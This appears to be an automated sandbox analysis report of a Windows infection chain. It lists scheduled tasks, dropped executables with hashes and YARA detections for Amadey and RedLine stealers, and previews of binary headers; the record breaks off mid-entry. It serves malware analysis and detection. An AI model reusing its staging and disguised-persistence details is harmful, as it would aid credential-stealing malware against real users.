01:32:59	Task Scheduler	Run new task: Firefox Default Browser Agent A54B4439726B9C57 path: C:\Users\user\AppData\Roaming\jfshvii
01:33:04	Task Scheduler	Run new task: pdates.exe path: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
01:33:04	API Interceptor	2358x Sleep call for process: pdates.exe modified
01:33:39	API Interceptor	26x Sleep call for process: ohcompetitive.exe modified
01:34:25	API Interceptor	39x Sleep call for process: j8994074.exe modified
01:34:27	API Interceptor	25x Sleep call for process: n7660022.exe modified
01:35:36	API Interceptor	32x Sleep call for process: ohcompettitive.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\h1931339.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\k4215493.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\j8994074.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2843
Entropy (8bit):	5.3371553026862095
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIWUfHKdHKBtBHK7HK5AHKzvQTHmtHoxHImHKoLHG1J:iqXeqm00YqhQnouOqdqxq7q2qzcGtIx+
MD5:	325E4B0634C6C9578C7D7D8197BD5BCA
SHA1:	1AD114002B0DDFF9C7C5175B0DA9E9FB40DD6BF0
SHA-256:	1B4A2571C8CD6A81820D851AF94A52502BEE6E4802EF4ADBF77F9F1E20F26601
SHA-512:	F03FC25705C318A8A26CD446B09A5FDD18EA8976854EECF26F7F02E9EF794C8A14711A556AA523DBC4FAFEA1377F1B46713554573C78A6471B490FE933751E52
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\n7660022.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2843
Entropy (8bit):	5.3371553026862095
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIWUfHKdHKBtBHK7HK5AHKzvQTHmtHoxHImHKoLHG1v:iqXeqm00YqhQnouOqdqxq7q2qzcGtIxQ
MD5:	175F668B778AC30479F5B59E81049690
SHA1:	EED21C68C79FADD0C5418CB419A2F788C4D9B623
SHA-256:	566120FB4286C3BEE01BB23D68C1AD333BE6BA67FE5EED57549111F612A9723E
SHA-512:	E20BC93055E13912567CC0168AA5F1F8414888EA9D59F8E90A939E09EE08A7D6E016169F4C371CD2403BFA17776C34F065EB5967578CFE71B6C4E707EF8C58B5
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ohcompetitive.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	5.369065873276151
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4q4E4K:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	013ADDD267304C9C4E8FFA6D760DA77B
SHA1:	6CEF9DE17E77A64370ABF5CEF692663FE7813A53
SHA-256:	EAEFB23F97C4F75160427E2BFC98C5BE50B1E42ACC979C6516801CC8476D2596
SHA-512:	3A68C0309FD205A64D3D2F2890025469FB96EE8CD372FC8A2FE67E30BF7CA726267EADBBE0704E38B0FCF763D4B53E7042046E2B3805A3ED5801629D3993CD7D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	984
Entropy (8bit):	5.2414849034866355
Encrypted:	false
SSDEEP:	24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
MD5:	4816271302882BDFB06EE40F624169D1
SHA1:	A8F07F0A5940C4A9D4DAD112787FE109CCACA869
SHA-256:	26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
SHA-512:	3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
Malicious:	false
Reputation:	unknown
Preview:	{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.347409191732122
Encrypted:	false
SSDEEP:	1536:Oo4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJUabaB89p:OoUCWbBNpplToUs1uNhj25LJUQaB89p
MD5:	2392B231CF4A80739B5CB09BF808127D
SHA1:	41B5CF81C50884954911D96444FE83CFD0DA465B
SHA-256:	2244B4DC9AFC6CFAB7EF1DEA92420E2ACD275BAC7349B929A69F3C1AE25F5E2F
SHA-512:	19CEBA063FA1CC1D0116EB11B18D6301A0E1EEDA1CB5B983E331E59E4F12E4D0E36D7B4A1D8259DFF57A79C47FDCEDF89DE8E255D932452E441762E4D440CE34
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....l.d...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3448.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165888
Entropy (8bit):	6.873298134683553
Encrypted:	false
SSDEEP:	3072:sahKyd2n31D5GWp1icKAArDZz4N9GhbkrNEk1bQiu0T:sahODp0yN90QEKL
MD5:	691A54B032D616E5F9303557FFD49ADD
SHA1:	F1361A480C7171ADC2C0E370E0C31B3C7758D18F
SHA-256:	D24CAC5596825FE9F802F9AA40201452C16F40FEA1B4C46B5A23423C13D7F180
SHA-512:	4A4F1F1814D3B6DDCB0BAD6D9A667296404CA9110E74DA992BE39BED54593C5131053439F385240C1EB6FA370B502B2AE0A0409FFEA193EAB5E01CD74FFC5E18
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|.....................@..........................................`.......... ......................................<...........$....................... .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6F2B.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	399360
Entropy (8bit):	7.745285261188996
Encrypted:	false
SSDEEP:	6144:K0y+bnr+Tp0yN90QEPA5j0+ZpDdYLjjF7uVgBZ+t42DlRu2hAbxBRGsCxe2w:UMrXy90W7peLjjFEgBYC2pANOsCrw
MD5:	C2525C86E7015D51FD9034964B41FAE7
SHA1:	55E240190C7A0A24226E3EAB5DEF28130412F538
SHA-256:	BE4BDE5329C264A4CF3FB56B55670B8B43773275E71EC44697FC00945BB528F8
SHA-512:	703C57DCE297FC4FDD01F2874E4885AD802EC8B92006C21872D56183AEA8A0173823CD23A1C3FEF58B9AD84364557E3F448EE4D5AA298342381A39E472B28CF2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................p...........@...... ...................................... ....................`..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7_Fjlbt.cpl

Download File

Process:	C:\Users\user\AppData\Local\Temp\B29C.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1302528
Entropy (8bit):	7.902300554233015
Encrypted:	false
SSDEEP:	24576:Bh1AsC3ELeX+Y/IwS4xorAnQs8XNzFoUhQMMYQQLCJrxeGL:ZATULeuX36UXNZoDBYQ40rFL
MD5:	ED31BE4674C78A3D68DE41308EBE5FF6
SHA1:	1E196A4644B8D3EFCBD0ECCEC73719C5A296BE7E
SHA-256:	FC948F7A0237A57155CB0262AD3425F339A706B3252B20618ABABD9D0196B8DA
SHA-512:	943FCFBD7D571F40A1A2D94406A7C30CAAE524A5888319DF43D0AA1913D3426367AC6383FD09E63FFDB32647EA9FB1C6961C9B1562C83EED9FC0EB3ACDF0EFA7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@........................................t....`...`...`.(q....`......`.Y...,.`.w...5.`..b....`.`....`..m....`.Y.....`..l....`...a.^.`.Rich..`.........................................................................................................PE..L......d...........!......................... ....@.................................................................(...H...p........`..h....................p...i................................................... ...............................text... ........................... ..`.rdata....... ....... ..............@..@.data... Y.......P..................@....rsrc...h....`.......P..............@..@.reloc...t...p.......`..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	228864
Entropy (8bit):	6.421068050458441
Encrypted:	false
SSDEEP:	3072:3vtV3ROZ6RDwrR3wMUzUVwQ3rInyRnIvPak3hhiHFSbuZhuNcZVKBzqm8LHIkbGB:ftV3euVz6rKyS3yHFHhuNcPKpwU+
MD5:	AEA234064483F651010CF9D981F59FEA
SHA1:	002AD73A666D2D92D0C6D6B617E61C6FA0C5F3A6
SHA-256:	58B02C8B4BC2BF7F5F1E8E45D7C206956F188AE56B648922CA75987B999DB503
SHA-512:	EAE415EF55AEB1B4548C2422A72E618FCE17C2C1322918D33DC6B9202A01C743A5684BA28E5D83B6CDB2B703BC12569E6BB0E87EF2DECB4E8A18592E1380A434
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L....l.d............................?V............@.......................................@..................................K..d................................!..`>..p...................t?.......>..@............................................text...=........................... ..`.rdata..............................@..@.data....$...`.......B..............@....rsrc................Z..............@..@.reloc...!......."...\..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B29C.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1485589
Entropy (8bit):	7.898760347434427
Encrypted:	false
SSDEEP:	24576:8cbD/e1EBKh1wk634Le3+Y1IWSAxobAtQs8XNPFoAhUKMYqQJ6NrLnGPFC82zZ:8cbi6swLILeOhDe0XNNoZbYqQirLGPFK
MD5:	929515C08EFDD71249F12EF92966A0AD
SHA1:	2968A131ED40A21674C19163711091CD3849429B
SHA-256:	0CAD28CB43C72FA792ECE392CB31C6377F68014CACB48571F4A4D144954BBC70
SHA-512:	33BEB472A9615EB5847EB31349FD30C16EEE801E094DE0B01F9D0DCE555A063D7614FF6DF7BA9E5B2C3F5173147C16E57957C58E01647C1AEC599BF32E7E0774
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=LF.S.F.S.F.S..$..K.S..$...S..$..^.S....D.S...W.U.S...P.Q.S...V.t.S.O...M.S.O...A.S.F.R.N.S...V.`.S...S.G.S....G.S...Q.G.S.RichF.S.................PE..L...f..d...............!.~...........]............@.......................................@.........................0..4...d..P...............................T)..@...T...........................8...@...............,...\ .......................text....}.......~.................. ..`.rdata.............................@..@.data....\...@.....................@....didat..x............:..............@....rsrc................<..............@..@.reloc..T).........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D217.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	399360
Entropy (8bit):	7.745824595003019
Encrypted:	false
SSDEEP:	6144:Kvy+bnr+5p0yN90QEld2iLPokWcnZNbQR5z/F0IrWSKEfd/lCCmu8mTdf7h4xDfv:tMr5y90LdVTqd0/SKSd/lCPmN4TLuU
MD5:	DD48A8AB0415034524EFC0AB82A32106
SHA1:	2929BA23D002D2F556B0776CA69C0116F68BF4ED
SHA-256:	8E2B5F580059AF2C18E5D3AB8E87CF89E02189948689183194990D1053C5333A
SHA-512:	E8F3C8409435FC2912A53E7794D28E931620ABE162723C1FC37863DEC8AE7EF98CDFDCA51D2E6D0443D02F48830056A6F9D88407BB3052D728AE086BCDC17422
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................p.......?....@...... ...........................................................`..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\6F2B.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	178742
Entropy (8bit):	5.7588433688365255
Encrypted:	false
SSDEEP:	3072:vAiq5kdS1l/Z2LxNjMIt04TMWVr8e8hn:vAiT8OPy4TMWVr
MD5:	E12039830693787EDB24E96255488216
SHA1:	FF598A56B5A872F46D4232A5A7D8FBA4AC79087A
SHA-256:	C34F93EE83B36577AE8B503D5CA9D92AA3961FE396E029D75AA2F608D6190EB2
SHA-512:	C4BDF674969DCAF65F0229A22870449B96C805A2E3FB93B2A287F38FB028D57E1C0A8D9A3ED598FF259B993E7742759530A0C7D7ED80F3A1DF63EABF9DAB0586
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............0... ...@....@.. ....................................@................................../..S....@..N............................................................................ ............... ..H............text...4.... ...................... ..`.rsrc...N....@......................@..@.reloc..............................@..B.................0......H............0.............................................................T...<.......\...}..d.O...T..&....[.x.3."!...V..'....z.....-.;....-.f.F<~.4>....e.K....Oi.99..C....V......Jp`.$...[.`.D..o.g....=k..\w..6B........T@..\|L..r.x.r....fs.N...g.........].-2Q..n.8..k&..WA....3....hrw.i....p..i.G..bQa..{...XK......hI.z}F."...kg....=.......r..oMOQD.""A..~..,..2P...r...c.8......x..J.'.M.......o....u...X!..V..VH4....[.....[.qL.KQ^.}.........K.....2\|..n

C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\6F2B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	239616
Entropy (8bit):	7.469099693488128
Encrypted:	false
SSDEEP:	6144:Kny+bnr+Gp0yN90QEKWkTnrhjB6gBZ+t47DJ:NMrSy90sJXhjB6gBYC71
MD5:	E0110D68A72C0533529AD08E05CBC2BC
SHA1:	C47D2A2519DE1F5D3741481908371B86673B7469
SHA-256:	6E52BBB2180319905E216B6ECEC7BF5A638EDD505FA7D2E46776410823CC7C96
SHA-512:	C04310CDCBD91E5ECDB1DE841921C5378BED928A04CE9C19C3BD5977F6F7927CB3C7C4CA12C504742126016D094CCDC07BB31D613E9DD5AC383F65AE1CF579D7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...@......`j............@.......................................@...... .......................................!..............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....0......."...\|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	228864
Entropy (8bit):	6.421068050458441
Encrypted:	false
SSDEEP:	3072:3vtV3ROZ6RDwrR3wMUzUVwQ3rInyRnIvPak3hhiHFSbuZhuNcZVKBzqm8LHIkbGB:ftV3euVz6rKyS3yHFHhuNcPKpwU+
MD5:	AEA234064483F651010CF9D981F59FEA
SHA1:	002AD73A666D2D92D0C6D6B617E61C6FA0C5F3A6
SHA-256:	58B02C8B4BC2BF7F5F1E8E45D7C206956F188AE56B648922CA75987B999DB503
SHA-512:	EAE415EF55AEB1B4548C2422A72E618FCE17C2C1322918D33DC6B9202A01C743A5684BA28E5D83B6CDB2B703BC12569E6BB0E87EF2DECB4E8A18592E1380A434
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L....l.d............................?V............@.......................................@..................................K..d................................!..`>..p...................t?.......>..@............................................text...=........................... ..`.rdata..............................@..@.data....$...`.......B..............@....rsrc................Z..............@..@.reloc...!......."...\..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\D217.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	178739
Entropy (8bit):	5.758911383920804
Encrypted:	false
SSDEEP:	3072:vAiq5kdS1l/Z2LxNjMIt04TMWVr8e8hn:vAiT8OPy4TMWVr
MD5:	A29812C26E88DF3CCEACCC0A46F42396
SHA1:	6F063741A71A8C5FB770E9E74F843C10DE03686E
